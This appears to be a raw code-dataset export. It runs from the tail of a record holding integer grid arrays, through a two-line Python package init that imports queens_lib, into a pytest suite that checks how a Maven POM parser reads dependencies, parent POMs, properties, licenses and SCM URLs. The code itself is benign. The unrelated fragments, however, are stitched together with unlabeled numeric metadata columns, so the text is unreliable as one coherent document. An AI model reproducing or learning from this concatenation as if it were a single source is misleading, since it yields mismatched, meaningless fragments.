[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]]
]
| 53.61745
| 90
| 0.523345
| 8,745
| 23,967
| 1.42024
| 0.035334
| 1.026248
| 1.502415
| 1.953945
| 0.690258
| 0.676892
| 0.673672
| 0.654911
| 0.654911
| 0.649758
| 0
| 0.369878
| 0.102975
| 23,967
| 446
| 91
| 53.737668
| 0.207824
| 0.166354
| 0
| 0.812308
| 0
| 0
| 0.007771
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.015385
| 0
| 0.046154
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d6668d7f125474f14fbaa6f021b6b94ba0fd7b4b
| 60
|
py
|
Python
|
mylib/__init__.py
|
913982779/eight_queens
|
5bbd6a5ee371843e6a22a063d8b8a1be4a885dbc
|
[
"MIT"
] | 1
|
2021-11-03T11:58:19.000Z
|
2021-11-03T11:58:19.000Z
|
mylib/__init__.py
|
913982779/eight_queens
|
5bbd6a5ee371843e6a22a063d8b8a1be4a885dbc
|
[
"MIT"
] | null | null | null |
mylib/__init__.py
|
913982779/eight_queens
|
5bbd6a5ee371843e6a22a063d8b8a1be4a885dbc
|
[
"MIT"
] | null | null | null |
from mylib import queens_lib
from mylib import screen_design
| 30
| 31
| 0.883333
| 10
| 60
| 5.1
| 0.7
| 0.352941
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 60
| 2
| 31
| 30
| 0.962264
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d6d2c020765c006c1a28e73f24013127d2d621c9
| 22,742
|
py
|
Python
|
test/platforms/jvm/test_maven_pom.py
|
toptal/license-cop
|
84f3dbf7b3632d761e423b182ce0d9927b885f41
|
[
"MIT"
] | 24
|
2017-11-21T18:30:19.000Z
|
2021-11-08T10:52:48.000Z
|
test/platforms/jvm/test_maven_pom.py
|
toptal/license-cop
|
84f3dbf7b3632d761e423b182ce0d9927b885f41
|
[
"MIT"
] | 27
|
2017-11-22T15:50:56.000Z
|
2021-09-30T09:03:21.000Z
|
test/platforms/jvm/test_maven_pom.py
|
toptal/license-cop
|
84f3dbf7b3632d761e423b182ce0d9927b885f41
|
[
"MIT"
] | 5
|
2017-11-21T14:08:21.000Z
|
2021-04-07T19:30:09.000Z
|
import pytest
from textwrap import dedent
from test import *
from app.platforms.jvm.maven_pom import MavenPom
from app.platforms.jvm.maven_dependency import MavenDependency
from app.platforms.jvm.package_name import JvmPackageName
from app.platforms.jvm.maven_package_registry import MavenPackageRegistry
from app.dependency import DependencyKind
@pytest.fixture
def registry():
return MavenPackageRegistry(http_compression=False)
def test_parse_scalar_xml(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<modelVersion>4.0.0</modelVersion>
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
<packaging>jar</packaging>
<description>kind-projector</description>
<url>http://github.com/non/kind-projector</url>
<version>0.9.4</version>
<licenses>
<license>
<name>MIT</name>
<url>http://opensource.org/licenses/MIT</url>
<distribution>repo</distribution>
</license>
<license>
<name>GPLv3</name>
<url>http://opensource.org/licenses/GPLv3</url>
<distribution>repo</distribution>
</license>
</licenses>
<name>kind-projector</name>
<organization>
<name>org.spire-math</name>
<url>http://github.com/non/kind-projector</url>
</organization>
<scm>
<url>git@github.com:non/kind-projector.git</url>
<connection>scm:git:git@github.com:non/kind-projector.git</connection>
</scm>
<developers>
<developer>
<id>d_m</id>
<name>Erik Osheim</name>
<url>http://github.com/non/</url>
</developer>
</developers>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.group_id == 'org.spire-math'
assert pom.artifact_id == 'kind-projector_2.10'
assert pom.version == '0.9.4'
assert pom.parent is None
assert pom.properties == {}
assert pom.dependencies == []
assert set(pom.licenses) == set(['MIT', 'GPLv3'])
assert pom.urls == set([
'http://github.com/non/kind-projector',
'git@github.com:non/kind-projector.git'
])
def test_parse_xml_with_dependencies(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
<version>0.9.4</version>
<dependencies>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-compiler</artifactId>
<version>2.10.6</version>
</dependency>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-library</artifactId>
<version>2.10.6</version>
</dependency>
<dependency>
<groupId>org.scalamacros</groupId>
<artifactId>quasiquotes_2.10</artifactId>
<version>2.1.0</version>
</dependency>
<dependency>
<groupId>com.novocode</groupId>
<artifactId>junit-interface</artifactId>
<version>0.11</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.ensime</groupId>
<artifactId>pcplod_2.10</artifactId>
<version>1.2.1</version>
<scope>test</scope>
</dependency>
</dependencies>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert set(pom.filter_dependencies(DependencyKind.RUNTIME)) == set([
MavenDependency('org.scala-lang', 'scala-compiler'),
MavenDependency('org.scala-lang', 'scala-library'),
MavenDependency('org.scalamacros', 'quasiquotes_2.10')
])
assert set(pom.filter_dependencies(DependencyKind.DEVELOPMENT)) == set([
MavenDependency('com.novocode', 'junit-interface', 'test'),
MavenDependency('org.ensime', 'pcplod_2.10', 'test')
])
def test_parse_xml_with_only_one_dependency(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<dependencies>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-compiler</artifactId>
<version>2.10.6</version>
</dependency>
</dependencies>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.dependencies == [
MavenDependency('org.scala-lang', 'scala-compiler')
]
def test_parse_xml_with_empty_dependencies_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<dependencies>
</dependencies>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.dependencies == []
@VCR.use_cassette('maven_pom_parse_xml_with_parent.yaml')
def test_parse_xml_with_parent(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.apache.ws.commons.axiom</groupId>
<artifactId>axiom-parent</artifactId>
<version>1.2.9</version>
<parent>
<groupId>org.apache</groupId>
<artifactId>apache</artifactId>
<version>7</version>
</parent>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.parent.group_id == 'org.apache'
assert pom.parent.artifact_id == 'apache'
assert pom.parent.version == '7'
assert pom.parent.parent is None
@VCR.use_cassette('maven_pom_parse_xml_with_parent_and_grandparent.yaml')
def test_parse_xml_with_parent_and_grandparent(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.apache.cxf</groupId>
<artifactId>apache-cxf</artifactId>
<version>2.2.5</version>
<parent>
<groupId>org.apache.cxf</groupId>
<artifactId>cxf-parent</artifactId>
<version>2.2.5</version>
<relativePath>../parent</relativePath>
</parent>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.parent.group_id == 'org.apache.cxf'
assert pom.parent.artifact_id == 'cxf-parent'
assert pom.parent.version == '2.2.5'
assert pom.parent.parent.group_id == 'org.apache.cxf'
assert pom.parent.parent.artifact_id == 'cxf'
assert pom.parent.parent.version == '2.2.5'
assert pom.parent.parent.parent is None
@VCR.use_cassette('maven_pom_parse_xml_with_group_id_from_parent.yaml')
def test_parse_xml_with_group_id_from_parent(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<parent>
<groupId>org.apache.cxf</groupId>
<artifactId>cxf-parent</artifactId>
<version>2.2.5</version>
<relativePath>../parent</relativePath>
</parent>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.group_id == 'org.apache.cxf'
def test_parse_xml_with_properties(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<properties>
<stax.impl.groupid>org.codehaus.woodstox</stax.impl.groupid>
<stax.impl.artifact>wstx-asl</stax.impl.artifact>
<stax.impl.version>3.2.9</stax.impl.version>
<failIfNoTests>false</failIfNoTests>
</properties>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.properties == {
'stax.impl.groupid': 'org.codehaus.woodstox',
'stax.impl.artifact': 'wstx-asl',
'stax.impl.version': '3.2.9',
'failIfNoTests': 'false'
}
@VCR.use_cassette('maven_pom_parse_xml_with_properties_merged_with_parent_properties.yaml')
def test_parse_xml_with_properties_merged_with_parent_properties(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<parent>
<groupId>org.apache</groupId>
<artifactId>apache</artifactId>
<version>7</version>
</parent>
<properties>
<stax.impl.groupid>org.codehaus.woodstox</stax.impl.groupid>
<stax.impl.artifact>wstx-asl</stax.impl.artifact>
<stax.impl.version>3.2.9</stax.impl.version>
<failIfNoTests>false</failIfNoTests>
</properties>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.properties == {
'stax.impl.groupid': 'org.codehaus.woodstox',
'stax.impl.artifact': 'wstx-asl',
'stax.impl.version': '3.2.9',
'failIfNoTests': 'false',
'distMgmtSnapshotsName': 'Apache Development Snapshot Repository',
'distMgmtSnapshotsUrl': 'https://repository.apache.org/content/repositories/snapshots',
'organization.logo': 'http://www.apache.org/images/asf_logo_wide.gif',
'project.build.sourceEncoding': 'UTF-8',
'sourceReleaseAssemblyDescriptor': 'source-release'
}
def test_parse_xml_with_only_one_property(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<properties>
<stax.impl.groupid>org.codehaus.woodstox</stax.impl.groupid>
</properties>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.properties == {'stax.impl.groupid': 'org.codehaus.woodstox'}
def test_parse_xml_with_empty_properties_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<properties>
</properties>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.properties == {}
def test_parse_xml_with_only_one_license(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
<license>
<name>MIT</name>
<url>http://opensource.org/licenses/MIT</url>
<distribution>repo</distribution>
</license>
</licenses>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.licenses == ['MIT']
def test_parse_xml_without_licenses_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.licenses == []
def test_parse_xml_with_empty_licenses_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
</licenses>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.licenses == []
def test_parse_xml_with_scalar_license_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
<license>MIT</license>
</licenses>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.licenses == ['MIT']
def test_parse_xml_with_empty_license_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<licenses>
<license></license>
</licenses>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.licenses == []
def test_parse_xml_without_url_tag(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.urls == set()
def test_parse_xml_with_empty_url_tag(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<url></url>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.urls == set()
def test_parse_xml_without_scm_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.urls == set()
def test_parse_xml_with_empty_scm_block(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<scm></scm>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.urls == set()
def test_parse_xml_with_scm_block_without_url(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<scm>
<connection>scm:git:git@github.com:non/kind-projector.git</connection>
</scm>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.urls == set()
def test_parse_xml_with_whitespace_at_beginning(registry):
xml = '''
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
</project>
'''
pom = MavenPom.parse(xml, registry)
assert pom.group_id == 'org.spire-math'
assert pom.artifact_id == 'kind-projector_2.10'
def test_parse_xml_with_invalid_bytes_at_beginning(registry):
xml = '''<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
</project>
'''
pom = MavenPom.parse(xml, registry)
assert pom.group_id == 'org.spire-math'
assert pom.artifact_id == 'kind-projector_2.10'
def test_parse_xml_ignoring_ampersand_character(registry):
xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
<developers>
<developer>
<id> </id>
<name>Simeon Fitch</name>
<url>http://www.mseedsoft.com/</url>
<roles>
<role>Developer</role>
</roles>
</developer>
</developers>
</project>
''')
pom = MavenPom.parse(xml, registry)
assert pom.group_id == 'org.spire-math'
assert pom.artifact_id == 'kind-projector_2.10'
@pytest.fixture
def pom(parent_pom):
return MavenPom(
group_id='com.example.foobar',
artifact_id='foobar',
version='1.2.3',
parent=parent_pom,
properties={
'foo.bar': 'FooBar',
'hello': 'hello-world'
}
)
@pytest.fixture
def parent_pom():
return MavenPom(
group_id='com.example',
artifact_id='foobar-parent',
version='4.5.6',
parent=None,
properties={
'hiThere': 'hi_there',
'omg': 'oh-my-god'
}
)
def test_get_project_builtin_properties(pom):
assert pom.get_property('project.groupId') == 'com.example.foobar'
assert pom.get_property('pom.groupId') == 'com.example.foobar'
assert pom.get_property('project.artifactId') == 'foobar'
assert pom.get_property('pom.artifactId') == 'foobar'
assert pom.get_property('project.version') == '1.2.3'
assert pom.get_property('pom.version') == '1.2.3'
